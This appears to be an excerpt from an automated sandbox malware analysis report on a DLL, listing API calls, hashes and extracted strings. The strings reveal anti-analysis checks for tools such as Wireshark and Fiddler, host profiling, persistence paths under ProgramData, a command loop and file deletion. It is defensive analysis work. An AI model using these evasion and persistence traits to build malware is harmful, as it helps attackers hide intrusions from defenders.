                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strstr$Window$IconicTextVisible
                                                  • String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
                                                  • API String ID: 4234658395-3439171801
                                                  • Opcode ID: 8eeb7fbb31f9eb743f324085d9b46446dd669c4992494f4a4a4c0b018a75921d
                                                  • Instruction ID: e51ac4a599cdda601b0c2b531e6086f83077b043e84e096e2867ba8e2ba4b22b
                                                  • Opcode Fuzzy Hash: 8eeb7fbb31f9eb743f324085d9b46446dd669c4992494f4a4a4c0b018a75921d
                                                  • Instruction Fuzzy Hash: 7E51A479A0031676D604F6708DC4ECB36D8EF5458AF454C3EF899DA040F739EB8886A3
                                                  APIs
                                                  • GetVersionExA.KERNEL32 ref: 1001B28C
                                                    • Part of subcall function 1001AC50: LoadLibraryW.KERNEL32(ntdll.dll,?,00000000,1001B2AF,?,?,?), ref: 1001AC59
                                                    • Part of subcall function 1001AC50: GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 1001AC6B
                                                    • Part of subcall function 1001AC50: FreeLibrary.KERNEL32(00000000), ref: 1001AC95
                                                    • Part of subcall function 1001A8F0: lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,755723A0), ref: 1001A98A
                                                    • Part of subcall function 1001A8F0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,?,00000000,755723A0), ref: 1001A9C4
                                                    • Part of subcall function 1001A8F0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,755723A0), ref: 1001A9D4
                                                    • Part of subcall function 1001A8F0: ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,00000000,755723A0), ref: 1001A9E4
                                                    • Part of subcall function 1001A8F0: CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,755723A0), ref: 1001A9EB
                                                    • Part of subcall function 1001A8F0: lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,755723A0), ref: 1001A9F8
                                                    • Part of subcall function 1001A8F0: gethostname.WS2_32(?,?), ref: 1001AA00
                                                    • Part of subcall function 1001A8F0: lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,755723A0), ref: 1001AA07
                                                  • getsockname.WS2_32(?), ref: 1001B2F6
                                                  • GetSystemInfo.KERNEL32(?,?,?,00000100,?,00000010,00000004), ref: 1001B363
                                                  • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001B384
                                                  • GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001B3CF
                                                  • GetDiskFreeSpaceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001B3EA
                                                  • GetTickCount.KERNEL32 ref: 1001B496
                                                  • wsprintfA.USER32 ref: 1001B4B8
                                                  • wsprintfA.USER32 ref: 1001B4DF
                                                  • wsprintfA.USER32 ref: 1001B504
                                                  • wsprintfA.USER32 ref: 1001B52B
                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 1001B54C
                                                    • Part of subcall function 1001AA20: lstrlenA.KERNEL32(?,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AAA6
                                                    • Part of subcall function 1001AA20: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AAE3
                                                    • Part of subcall function 1001AA20: GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AAF3
                                                    • Part of subcall function 1001AA20: ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AB03
                                                    • Part of subcall function 1001AA20: CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AB0A
                                                    • Part of subcall function 1001AA20: lstrlenA.KERNEL32(?,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AB11
                                                  • lstrcpyA.KERNEL32(?,?,?,00000100), ref: 1001B5B9
                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 1001B5C9
                                                  • GetLastInputInfo.USER32(?), ref: 1001B5E3
                                                  • GetTickCount.KERNEL32 ref: 1001B5E9
                                                  • _access.MSVCRT ref: 1001B608
                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 1001B62B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$lstrlen$lstrcpywsprintf$CloseCountCreateFreeHandleInfoLibraryReadSizeTick$AddressDiskDriveGlobalInputLastLoadMemoryProcSpaceStatusSystemTypeVersion_accessgethostnamegetsockname
                                                  • String ID: %$@$C:\ProgramData\jerrt.txt$D$Default$a$d$e$f$f$l$t$u
                                                  • API String ID: 429165215-739913618
                                                  • Opcode ID: 84f7ab41cf382331de70dda952f8e925426c53ffd37516e89aa26b90f2faa6e6
                                                  • Instruction ID: 19fc458fa8316cdb41dcceebf3bf2bcc8f1563bf78e97388c6256f2331895855
                                                  • Opcode Fuzzy Hash: 84f7ab41cf382331de70dda952f8e925426c53ffd37516e89aa26b90f2faa6e6
                                                  • Instruction Fuzzy Hash: 55A19CB55083859FD724CB68CC84BDBBBE9EBC8304F444A1DF58987241EB75A648CB62
                                                  APIs
                                                  • Sleep.KERNEL32(00000BB8,?,?,?,?,?,10098BF2,000000FF), ref: 1001D4C8
                                                  • sprintf.MSVCRT ref: 1001D4E7
                                                    • Part of subcall function 1001D480: GetFileAttributesA.KERNEL32(?,1001D9C8,?), ref: 1001D485
                                                  • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1001D540
                                                  • GetFileAttributesA.KERNEL32(?), ref: 1001D595
                                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 1001D5AB
                                                  • wsprintfA.USER32 ref: 1001D5D2
                                                  • CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,00000001), ref: 1001D5E7
                                                  • GetLastError.KERNEL32(?,?,?,?,00000001), ref: 1001D5F3
                                                  • ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000001), ref: 1001D601
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000001), ref: 1001D608
                                                    • Part of subcall function 100048B0: WSAStartup.WS2_32(00000202,?), ref: 1000491D
                                                    • Part of subcall function 100048B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000492B
                                                    • Part of subcall function 1001D3B0: time.MSVCRT(00000000,1001DC1C), ref: 1001D3B2
                                                    • Part of subcall function 1001D3B0: srand.MSVCRT ref: 1001D3B9
                                                    • Part of subcall function 1001D390: EnumWindows.USER32(1001D150,?), ref: 1001D3A0
                                                  • Sleep.KERNEL32(000003E8), ref: 1001D64B
                                                  • Sleep.KERNEL32(000186A0), ref: 1001D665
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001D67F
                                                  • GetTickCount.KERNEL32 ref: 1001D681
                                                  • GetTickCount.KERNEL32 ref: 1001D6AC
                                                  • GetTickCount.KERNEL32 ref: 1001D6F1
                                                  • GetTickCount.KERNEL32 ref: 1001D735
                                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001D758
                                                  • GetTickCount.KERNEL32 ref: 1001D77B
                                                  • Sleep.KERNEL32(00000096,?,00000001), ref: 1001D79A
                                                  • GetTickCount.KERNEL32 ref: 1001D7B7
                                                  • WaitForSingleObject.KERNEL32(?,00000064,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001D7C5
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001D7DA
                                                  • #825.MFC42(?), ref: 1001D866
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$CountTick$Create$AttributesFileMutex$#825CloseD@2@@std@@D@std@@DirectoryEnumErrorEventGrow@?$basic_string@HandleLastObjectReleaseSingleStartupU?$char_traits@V?$allocator@WaitWindowssprintfsrandtimewsprintf
                                                  • String ID: %s:%d:%s$1.0.0$C:\ProgramData\%d.ini$C:\ProgramData\Microsoft Drive1$MyService1$e
                                                  • API String ID: 287845118-1910566113
                                                  • Opcode ID: 2d8dbbc255a1238c5a8ff77599e22bcbf11bc0636042b5c2565333a65060a181
                                                  • Instruction ID: 3369aabaadd7fa8e5de05b1f1d76e7fee78a4b58f25324653434795142b70bee
                                                  • Opcode Fuzzy Hash: 2d8dbbc255a1238c5a8ff77599e22bcbf11bc0636042b5c2565333a65060a181
                                                  • Instruction Fuzzy Hash: F0A1B1351083818FE320FF748C85B9EB7E4EB85744F44492DF9899B281EB75E949CB62
                                                  APIs
                                                    • Part of subcall function 1001D890: GetModuleFileNameA.KERNEL32 ref: 1001D8AD
                                                    • Part of subcall function 1001D890: strrchr.MSVCRT ref: 1001D8C3
                                                    • Part of subcall function 1001D890: strrchr.MSVCRT ref: 1001D904
                                                    • Part of subcall function 1001D890: isdigit.MSVCRT ref: 1001D93C
                                                    • Part of subcall function 1001D890: memmove.MSVCRT(?,?), ref: 1001D95D
                                                  • CreateThread.KERNEL32(00000000,00000000,1001D4A0,00000000,00000000,00000000), ref: 1001DAA4
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,10098C22,000000FF), ref: 1001DAB4
                                                  • sprintf.MSVCRT ref: 1001DAD3
                                                  • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1001DB2C
                                                  • ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1001DB4F
                                                    • Part of subcall function 100048B0: WSAStartup.WS2_32(00000202,?), ref: 1000491D
                                                    • Part of subcall function 100048B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000492B
                                                    • Part of subcall function 1001D3B0: time.MSVCRT(00000000,1001DC1C), ref: 1001D3B2
                                                    • Part of subcall function 1001D3B0: srand.MSVCRT ref: 1001D3B9
                                                  • GetFileAttributesA.KERNEL32(?), ref: 1001DB83
                                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 1001DB99
                                                  • wsprintfA.USER32 ref: 1001DBC0
                                                  • CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,00000001), ref: 1001DBD5
                                                  • GetLastError.KERNEL32(?,?,?,?,00000001), ref: 1001DBE1
                                                  • ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000001), ref: 1001DBEF
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000001), ref: 1001DBF6
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001DC3A
                                                  • GetTickCount.KERNEL32 ref: 1001DC40
                                                  • GetTickCount.KERNEL32 ref: 1001DC67
                                                  • GetTickCount.KERNEL32 ref: 1001DCAC
                                                  • GetTickCount.KERNEL32 ref: 1001DCF0
                                                  • GetTickCount.KERNEL32 ref: 1001DD0E
                                                  • Sleep.KERNEL32(00000064,?,00000001), ref: 1001DD2A
                                                  • GetTickCount.KERNEL32 ref: 1001DD46
                                                  • WaitForSingleObject.KERNEL32(?,00000064,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001DD54
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001DD69
                                                  • #825.MFC42(?), ref: 1001DE12
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CountTick$Create$Sleep$CloseD@2@@std@@D@std@@FileHandleMutexU?$char_traits@V?$allocator@strrchr$#825AttributesDirectoryEos@?$basic_string@ErrorEventGrow@?$basic_string@LastModuleNameObjectReleaseSingleStartupThreadWaitisdigitmemmovesprintfsrandtimewsprintf
                                                  • String ID: %s:%d:%s$1.0.0$C:\ProgramData\%d.ini$C:\ProgramData\Microsoft Drive$MyService$e
                                                  • API String ID: 4188121392-1841343700
                                                  • Opcode ID: 71693cf316dece4956bf05091169f15765b1d0146be7488c9e825e56bf82e074
                                                  • Instruction ID: 5ffaa32049bab8ff11e882cd0e0276c61fe5d34f044753baf71bd89b66df33c0
                                                  • Opcode Fuzzy Hash: 71693cf316dece4956bf05091169f15765b1d0146be7488c9e825e56bf82e074
                                                  • Instruction Fuzzy Hash: C7A1F6751083419BE320FF68CC85BABB7E4EF95744F04091DF9898B191DB75E988C762
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Event
                                                  • String ID: /*/$C:\ProgramData\Microsoft Drive\De.ini$Loop stopped as 1.txt does not exist.$Received command to stop loop. De.ini deleted.$jieshuxunhuan
                                                  • API String ID: 4201588131-4242312597
                                                  • Opcode ID: cd35a89f4f8be346bd41b26d9235ab9bc9cdfa24ee5166abe599360f9c5a6fc0
                                                  • Instruction ID: 368dbf102333d3f33aab7b414df493a5988d33fb55c3cd96ca69a7f772dd8b24
                                                  • Opcode Fuzzy Hash: cd35a89f4f8be346bd41b26d9235ab9bc9cdfa24ee5166abe599360f9c5a6fc0
                                                  • Instruction Fuzzy Hash: 2771F7B5604209AFF340DF389C81D9F77DCEF95295F040629F98E93246EB21F94897A2
                                                  APIs
                                                  • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                  • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                  • ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                  • ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                  • ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                  • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                  • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                  • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                  • _strcmpi.MSVCRT ref: 1000BE80
                                                  • _strcmpi.MSVCRT ref: 1000BE97
                                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?), ref: 1000BEB3
                                                  • #825.MFC42(?), ref: 1000BF08
                                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?), ref: 1000BF2D
                                                  • DeleteFileA.KERNEL32(?), ref: 1000BF42
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 1000BF7B
                                                  • FindClose.KERNEL32(00000000), ref: 1000BF8A
                                                  • RemoveDirectoryA.KERNEL32(?), ref: 1000BF98
                                                  • #825.MFC42(?), ref: 1000BFBA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$D@2@@0@FileFindHstd@@Tidy@?$basic_string@V10@V?$basic_string@$#825_strcmpi$?append@?$basic_string@CloseDeleteDirectoryEos@?$basic_string@FirstFreeze@?$basic_string@Grow@?$basic_string@NextRemoveV12@Xran@std@@
                                                  • String ID: *.*
                                                  • API String ID: 2724700886-438819550
                                                  • Opcode ID: ad1961a91edd804f932eaf2f8cfb1b55517e5a9efd2cd6c5a4194da2198bfaeb
                                                  • Instruction ID: 3864407029e8fe6deab90730e0e99c0bea179ee7459791ed1101209935cd539f
                                                  • Opcode Fuzzy Hash: ad1961a91edd804f932eaf2f8cfb1b55517e5a9efd2cd6c5a4194da2198bfaeb
                                                  • Instruction Fuzzy Hash: F371E2754087859FE710DF24CC94AEEBBE4FB84380F444A2DF985872A5DB31A909CF52
                                                  APIs
                                                  • GetWindowLongA.USER32(?,000000EB), ref: 10002357
                                                  • PostQuitMessage.USER32(00000000), ref: 10002387
                                                  • SetWindowLongA.USER32(?,000000EB,?), ref: 100023A9
                                                  • GetModuleHandleA.KERNEL32(00000000,00000066), ref: 100023B3
                                                  • LoadIconA.USER32(00000000), ref: 100023BA
                                                  • SetClassLongA.USER32(?,000000F2,00000000), ref: 100023C4
                                                  • DestroyWindow.USER32(?), ref: 100023EA
                                                  Strings
                                                  • %s %d/%d/%d %d:%02d:%02d %s, xrefs: 10002513
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LongWindow$ClassDestroyHandleIconLoadMessageModulePostQuit
                                                  • String ID: %s %d/%d/%d %d:%02d:%02d %s
                                                  • API String ID: 3894596752-2160474225
                                                  • Opcode ID: 1df45b0cbe7480826528f3af86080661679982990957d4321143eb1b41b224bf
                                                  • Instruction ID: 913433c1a196e8c17d4762009bd36f23bd83a96a7512fdbe89ff7e8246f26fd0
                                                  • Opcode Fuzzy Hash: 1df45b0cbe7480826528f3af86080661679982990957d4321143eb1b41b224bf
                                                  • Instruction Fuzzy Hash: 755122765046166FF321CB28CCC5FFB77ACFF48351F084635FA4AD21C2CA69A9098661
                                                  APIs
                                                  • lstrcatA.KERNEL32(00000000,?), ref: 1002AB66
                                                  • lstrcatA.KERNEL32(00000000,\*.*), ref: 1002AB75
                                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 1002AB91
                                                  • strstr.MSVCRT ref: 1002AC63
                                                  • GetPrivateProfileStringA.KERNEL32(InternetShortcut,URL,1012B024,?,00000104,?), ref: 1002ACB3
                                                  • lstrlenA.KERNEL32(00000000), ref: 1002ACBD
                                                  • lstrlenA.KERNEL32(?), ref: 1002ACC6
                                                  • LocalSize.KERNEL32(?), ref: 1002ACDC
                                                  • LocalReAlloc.KERNEL32(?,-00000400,00000042), ref: 1002ACF5
                                                  • lstrlenA.KERNEL32(?), ref: 1002AD05
                                                  • lstrlenA.KERNEL32(?), ref: 1002AD2F
                                                  • lstrlenA.KERNEL32(00000000), ref: 1002AD49
                                                  • lstrlenA.KERNEL32(00000000), ref: 1002AD79
                                                  • FindNextFileA.KERNEL32(?,?), ref: 1002AD95
                                                  • FindClose.KERNEL32(?), ref: 1002ADA4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Find$FileLocallstrcat$AllocCloseFirstNextPrivateProfileSizeStringstrstr
                                                  • String ID: .$.url$InternetShortcut$URL$\*.*
                                                  • API String ID: 3365753205-65308377
                                                  • Opcode ID: 71ef5b7e3128689d1d3063d88393cca5a54974f0cc1083af4269ccdbb3d3c9be
                                                  • Instruction ID: 3beaf7f51b6d9f7d8a427c2ba6f10f9899865e4eaa90444da4ba9e9e6c3921a7
                                                  • Opcode Fuzzy Hash: 71ef5b7e3128689d1d3063d88393cca5a54974f0cc1083af4269ccdbb3d3c9be
                                                  • Instruction Fuzzy Hash: CB6115352046449FD729CB24CC85AEB73E6FBC4305F544A1DFA4AA3690DF74A90AC745
                                                  APIs
                                                  • lstrlenA.KERNEL32(?,?,?,00000000,00000065), ref: 100092C6
                                                  • wsprintfA.USER32 ref: 1000931C
                                                  • FindFirstFileA.KERNEL32(?,?,100FA614,?,00000000,00000065), ref: 1000932E
                                                  • wsprintfA.USER32 ref: 10009390
                                                  • wsprintfA.USER32 ref: 100093BC
                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 100093D6
                                                  • DeleteFileA.KERNEL32(?), ref: 100093E4
                                                  • FindNextFileA.KERNEL32(?,?), ref: 100093F4
                                                  • FindClose.KERNEL32(?), ref: 10009407
                                                  • RemoveDirectoryA.KERNEL32(?), ref: 1000940E
                                                  Strings
                                                  Memory Dump Source
